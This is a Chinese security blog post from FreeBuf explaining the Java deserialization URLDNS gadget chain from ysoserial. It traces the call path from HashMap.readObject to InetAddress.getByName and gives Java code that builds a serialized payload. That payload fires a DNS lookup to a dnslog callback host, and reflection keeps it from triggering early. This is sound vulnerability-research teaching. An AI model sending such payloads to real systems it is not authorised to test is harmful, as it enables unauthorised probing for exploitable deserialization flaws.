JAVA反序列化之URLDNS链 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

Web安全

JAVA反序列化之URLDNS链

深渊sec 2024-10-21 16:53:35 33475

本文由深渊sec 创作，已纳入「FreeBuf原创奖励计划」，未授权禁止转载

背景

URLDNS是ysoserial中最简单的⼀条利⽤链,因为其如下的优点,⾮常适合我们在检测反序列化漏洞时使用：

使⽤Java内置的类构造，对第三⽅库没有依赖
在⽬标没有回显的时候，能够通过DNS请求得知是否存在反序列化漏洞

前言

首先，我认为Java反序列化的挖掘，主要分为一下三个方面：

入口类
目标类
执行函数（rce、文件上传、ssrf）

分析

HashMap类中,重写了反序列化的方法，即readObject()方法。

readObject()方法调用了hash()方法。

hash()方法调用了Key值的hashCode方法。（Object key 我们可控，即需要寻找一个类中存在hashcode方法且可以序列化）

定位到URL类，存在hashcode方法且可以序列化。

1729416996_6714cf2465a98ed373723.png!small?1729416996433

跟进URL类的hashcode方法，进入getHostAddress方法。发现调用了getByName(host)获取目标ip地址,会发送一次DNS请求。

1729417036_6714cf4c06e123c5667b7.png!small?1729417036054

1729417049_6714cf59c37b1849c6c49.png!small?1729417049842

思路总结

HashMap->readObject()
HashMap->hash()
URL->hashCode()
URLStreamHandler->hashCode()
URLStreamHandler->getHostAddress()
InetAddress->getByName()

小插曲

put方法也会调用hash()方法，我们的dnslog也会收到请求，迷惑我们以为攻击成功，其实不然。果然代码审计也要熟读孙子兵法。

hashmap.put(url,1);

public V put(K key, V value) {
return putVal(hash(key), key, value, false, true);
}

但是请求一次后hash值会改变，这样我们就无法执行hashCode方法了。

public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;
}

所以在写链子的时候，我们就用到了反射这个知识点，修改URL类中hashCode的值。

反序列化链

public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchMethodException, NoSuchFieldException, IllegalAccessException {
//Person person = new Person("zhangsan", 24, 1213);
//支持序列化，重写了readObject方法，是一个很好的入口类。
HashMap<URL, Integer> hashmap = new HashMap<>();
URL url = new URL("http://shenyuan8.dnslog.pw");

Class c = url.getClass();
Constructor constructor = c.getConstructor(String.class);
//修改URL类中的私有变量hashCode
Field code = c.getDeclaredField("hashCode");
code.setAccessible(true);
code.set(url,123);
hashmap.put(url,1);
code.set(url,-1);
serialize(hashmap);


}